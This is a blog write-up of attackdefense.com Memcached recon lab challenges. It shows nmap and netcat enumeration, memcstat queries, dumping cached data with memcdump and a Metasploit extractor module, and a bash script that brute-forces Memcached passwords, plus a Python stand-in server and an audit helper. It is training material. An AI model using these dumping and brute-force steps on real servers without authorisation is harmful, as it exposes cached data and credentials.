Memcached - Network Recon

This post describes key learnings from solving the Memcached challenges under Network Recon on attackdefense.com

Note: The contents of the post are helpful in solving the challenges, but they are not a complete step-by-step solution

. . .

Introduction

What is Memcached?

Memcached is an in-memory key-value store for small chunks of arbitrary data (strings, objects) produced by database calls, API calls, or page rendering.
Essentially, it is an object caching system intended to speed up dynamic web applications by taking load off the database.

. . .

Tools

We can install the tools dedicated to interacting with Memcached using the following command

apt-get install libmemcached-tools

After installing the package, we get a list of utilities that are now available in our arsenal to interact with Memcached.

List of memc* utilities available
. . .

Enumeration

Memcached is usually hosted on port 11211.
If not, we can always scan all the ports on the target :)

Version Enumeration

Nmap

We can use the -sV flag to enumerate the service version

version information

If we want more information we can use NSE scripts: searching the directory `/usr/share/nmap/scripts` for 'memcached' turns up a single script, 'memcached-info.nse', which gives us additional information about the hosted service.

memcached recon using nmap nse scripts

Notice that the service does not require any authentication. ( This is why we do recon, to find easy targets :P )

Using netcat and telnet

We can use netcat and telnet to enumerate the version as well.

nc -v $target 11211
version
using netcat and telnet for version enumeration

Service Enumeration

We can use memcstat to gather more information about the server

memcstat --server=<ip_address>
service enumeration
This is a snippet; the actual output is a lot bigger and gives more information about the hosted service
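As an added example (not part of the original post), here is the same `version` and `stats` exchange that netcat/telnet and memcstat perform, written in Python as a small client that parses the text-protocol replies. To keep it runnable offline it talks to a constructed stand-in server on localhost; that server, its port and every STAT value it returns are made up for the demonstration, and `accepts_unauthenticated` is a hypothetical audit helper rather than a libmemcached feature.

```python
"""Memcached text-protocol exchange (version/stats) against a constructed
local stand-in server. Added example, not code from the original post."""
import socket
import threading

# Constructed replies modelled on the memcached text protocol; they are not
# captured from any real host.
FAKE_VERSION = "1.5.6"
FAKE_STATS = {"pid": "1", "uptime": "120", "version": FAKE_VERSION,
              "curr_items": "3", "auth_cmds": "0"}


def _serve_one(conn):
    # Handle one client connection with a tiny subset of the protocol:
    # commands are CRLF-terminated lines, replies end with CRLF or END.
    buf = b""
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:
                return
            buf += data
            while b"\r\n" in buf:
                line, buf = buf.split(b"\r\n", 1)
                cmd = line.decode(errors="replace").strip()
                if cmd == "version":
                    conn.sendall(f"VERSION {FAKE_VERSION}\r\n".encode())
                elif cmd == "stats":
                    body = "".join(f"STAT {k} {v}\r\n" for k, v in FAKE_STATS.items())
                    conn.sendall((body + "END\r\n").encode())
                elif cmd == "quit":
                    return
                else:
                    conn.sendall(b"ERROR\r\n")


def start_fake_memcached():
    """Start the stand-in server on an ephemeral localhost port; return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_serve_one, args=(conn,), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def _send(host, port, cmd, terminator):
    # Send one command and read until the reply's terminator is seen.
    with socket.create_connection((host, port), timeout=3) as s:
        s.sendall(cmd.encode() + b"\r\n")
        buf = b""
        while not buf.endswith(terminator):
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return buf.decode(errors="replace")


def get_version(host, port):
    """Same exchange as typing `version` into nc; returns the version string."""
    reply = _send(host, port, "version", b"\r\n")
    if not reply.startswith("VERSION "):
        raise ValueError(f"unexpected reply: {reply!r}")
    return reply.split()[1]


def get_stats(host, port):
    """Same exchange memcstat relies on; returns the STAT lines as a dict."""
    reply = _send(host, port, "stats", b"END\r\n")
    stats = {}
    for line in reply.splitlines():
        if line.startswith("STAT "):
            _, key, value = line.split(" ", 2)
            stats[key] = value
    return stats


def accepts_unauthenticated(host, port):
    """Audit check: True if `stats` is answered without any authentication step."""
    try:
        return "version" in get_stats(host, port)
    except (OSError, ValueError):
        return False


if __name__ == "__main__":
    port = start_fake_memcached()
    print("version:", get_version("127.0.0.1", port))
    print("answers stats unauthenticated:", accepts_unauthenticated("127.0.0.1", port))
```

Pointing `get_version`/`get_stats` at a real host and port 11211 reproduces what the nc and memcstat steps above show; the parsed `stats` dict is the structured form of the memcstat output, which is handy when checking many of your own instances for unauthenticated exposure.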

Note: Memcached supports authentication, but it can allow unauthenticated access as well. It is also useful to know during pentests that the authentication mechanism Memcached uses is SASL.

Authenticated Access

For authenticated access, we can pass a username and password to all memc* tools.

memcstat --server=<ip_address> --username=<username> --password=<password>
. . .

Dumping Data

Using memcdump

We can get a dump of all keys using memcdump, after which we can use memccat to get the data stored in those keys.

dumping data using memcdump

Using Metasploit

root@attackdefense:~# msfconsole 
msf5 > use auxiliary/gather/memcached_extractor 
msf5 auxiliary(gather/memcached_extractor) > set RHOSTS 192.207.161.3 
msf5 auxiliary(gather/memcached_extractor) > exploit
dumping data using metasploit
. . .

Bruteforcing

As we saw above, Memcached often uses authentication, so we can try brute-forcing and hope we get lucky :P
Thankfully, a brute-forcing script was shared along with the lab access.

Source Code:

#!/bin/bash
# Usage: ./script <server> <username> <wordlist>
# Tries each line of the wordlist as the password for the given user and
# stops at the first one memcstat accepts (its output then starts with "Server:").
while read -r F ; do
    echo "Trying $F"
    if memcstat --servers="$1" --username="$2" --password="$F" | grep -q Server ; then
        echo "Password Found: $F"
        break
    fi
done < "$3"

It can be run using ./script $target $username <wordlist>

. . .

Final Note

So this is what I have to share with respect to Memcached; I welcome all comments and improvements that are necessary.